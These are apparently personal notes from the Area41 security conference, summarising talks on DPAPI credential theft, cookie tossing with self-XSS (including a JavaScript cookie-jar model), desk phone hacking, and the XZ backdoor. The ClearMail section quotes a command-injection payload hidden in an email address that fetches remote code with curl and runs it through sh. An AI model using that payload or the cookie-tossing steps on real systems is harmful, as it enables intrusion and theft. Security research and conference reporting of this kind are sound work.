Area41
Why write these notes? They are an easy way to find references in some years' time; for instance, if I recall a presentation, will I remember:
- which conference was it?
- which speaker?
- where are the slides?
Note. At the time of writing the slides are not published, but most talks will be available at https://www.youtube.com/@defconswitzerland/
Keynote
Speaker. Paula Januszkiewicz @PaulaCqure
Keynote with technical demos showing two nice tricks. First: given local admin access to a workstation, if another user is logged into the machine, it is possible to start a service as that user. Second: NTDS.DIT contains the certificate used to encrypt DPAPI keys, which protect, among other things, passwords stored in Chrome. Note that after a compromise it is not possible to change that certificate (unless multiple hacks are used, which involve losing customer support).
The tools used to decrypt Chrome passwords can be looked up under CQTools, CQURE and DPAPI.
Switching 400'000 Volts with a TCP packet
Speaker. Cyrill Brunschwiler @cybrz
Talk on the Swiss electrical grid and substations. Given my complete lack of knowledge in the field of electricity I did not understand a thing, but I found it interesting to be exposed to infrastructure completely unknown to me. In addition, one of the takeaways was that cyber attacks can cause blackouts lasting from hours to a day, but in case of war the real threat is missiles.
Armored Witness - Building a Trusted Notary for Bare Metal
Speaker. Andrea Barisani - @AndreaBarisani
Presentation of the https://transparency.dev/ project, based on the TamaGo and GoTEE frameworks. Best to check out the project website rather than summarizing it here.
Self-XSS with Cookie Tossing
Speaker. Thomas Houhou @Th0h0
The talk explores how self-XSS can be abused in combination with cookie tossing. The idea is as follows:
- self-XSS in parent-domain.com on e.g. /profile
- the attacker has control of a subdomain: either via XSS or by ownership (e.g. attacker-blog.parent-domain.com)
- the attacker sends the victim a link to the controlled subdomain
- from the controlled subdomain the attacker sets a cookie for the path parent-domain.com/profile (where the self-XSS is present on the parent domain)
- on that path the victim is logged in as the attacker
- the self-XSS executes; it is now possible to perform actions, e.g. /get-contacts, in the session of the victim (the prerequisite is that the victim is already logged in on parent-domain.com)
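The sequence above in a small browser cookie-jar model, added here as an example and not part of the talk or these notes: it shows which cookie the browser sends to /profile versus /get-contacts, and that a session cookie carrying the __Host- prefix (which forbids a Domain attribute) cannot be tossed from a subdomain. Host names, the cookie name and the values are constructed.

```javascript
// Added example, not from the talk or these notes: a minimal model of the RFC 6265
// cookie-jar rules, showing why a cookie set from a subdomain with
// Domain=parent-domain.com and Path=/profile reaches the parent domain ahead of the
// victim's own cookie, and why a __Host- prefixed cookie cannot be tossed that way.

function domainMatches(host, cookieDomain) {
  return host === cookieDomain || host.endsWith("." + cookieDomain);
}

function pathMatches(reqPath, cookiePath) {
  if (reqPath === cookiePath) return true;
  if (!reqPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || reqPath[cookiePath.length] === "/";
}

// Store a cookie as a Set-Cookie response from setterHost would; returns false
// when the browser must reject it (RFC 6265bis cookie-prefix and domain rules).
function setCookie(jar, setterHost, c) {
  const hostOnly = !c.domain, domain = c.domain || setterHost, path = c.path || "/";
  // __Host- forbids a Domain attribute and requires Path=/ and Secure
  if (c.name.startsWith("__Host-") && (!hostOnly || path !== "/" || !c.secure)) return false;
  if (!domainMatches(setterHost, domain)) return false; // may only set for its own domain tree
  const entry = { name: c.name, value: c.value, domain, path, hostOnly };
  const i = jar.findIndex(o => o.name === c.name && o.domain === domain && o.path === path);
  if (i >= 0) jar[i] = entry; else jar.push(entry); // same name+domain+path replaces
  return true;
}

// Cookie header for a request to host + reqPath; longer paths come first (RFC 6265
// section 5.4), so the tossed cookie shadows the real one when a server takes the first value.
function cookieHeader(jar, host, reqPath) {
  return jar
    .filter(c => (c.hostOnly ? host === c.domain : domainMatches(host, c.domain)))
    .filter(c => pathMatches(reqPath, c.path))
    .sort((a, b) => b.path.length - a.path.length)
    .map(c => `${c.name}=${c.value}`)
    .join("; ");
}

// Constructed scenario: the victim is logged in on the parent domain, then visits
// the attacker-controlled subdomain, which sets a cookie of the same name.
function cookieTossingScenario(sessionName) {
  const jar = [];
  setCookie(jar, "parent-domain.com", { name: sessionName, value: "victim", path: "/", secure: true });
  const tossed = setCookie(jar, "attacker-blog.parent-domain.com",
    { name: sessionName, value: "attacker", domain: "parent-domain.com", path: "/profile", secure: true });
  return { tossed, onProfile: cookieHeader(jar, "parent-domain.com", "/profile"),
           onContacts: cookieHeader(jar, "parent-domain.com", "/get-contacts") };
}
```

Running cookieTossingScenario("session") versus cookieTossingScenario("__Host-session") contrasts the vulnerable and the hardened cookie name.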
Hacking Desktop Phones
Speaker. Michael Oelke
The talk presents multiple ways to compromise desktop phones given physical access.
Main takeaway from my perspective: these phones are a full Linux box where it is easy to priv-esc. If the phones are not deployed in a dedicated and restricted VLAN, they offer an interesting place for persistence, given that no EDR is running on them.
Blogpost: https://www.pentagrid.ch/en/blog/rce-and-local-root-in-openstage-and-openscape-phones/.
Shells at Midnight: Turning a Spam Filter Against Itself
Speaker. Michael Imfeld @born0nmonday@chaos.social
The talk covers a command injection vulnerability in the ClearMail spam filter, where the email address is used in a Perl script running from a cron job. Within the constraints of the email RFC it is possible to embed a curl | sh in the email address.
TL;DR:
john.doe+|||a=`df|tac`&&curl${a##*d}.modzero.com|cat|sh||@gmail.com
Blogpost: https://modzero.com/en/blog/beyond_the_at_symbol/
Phishing for Primary Refresh Tokens in Microsoft Entra
Speaker. Dirk-jan Mollema @_dirkjan
The talk explores how the provisioning of MFA methods in Microsoft Entra is done from scenarios where strong authentication cannot be enforced, e.g. during device setup.
Technical Deep Dive into the XZ backdoor
Speaker. Timo Schmid @bluec0re
A technical deep dive into the XZ backdoor (not covering the timeline, attribution, etc.).
Red Cell - Mimicking Threat Actors for Realistic Responses
Speaker. Thomas Chopitea @tomchop_
The talk covers the difference between a red cell exercise and red teams. It also provides tips on how to balance the well-being of employees with keeping the threat real (e.g. do you inform the blue team that they are dealing with an exercise, and if so, after how many days? Do you pause the exercise over the weekend, both on the defense and on the offense side?).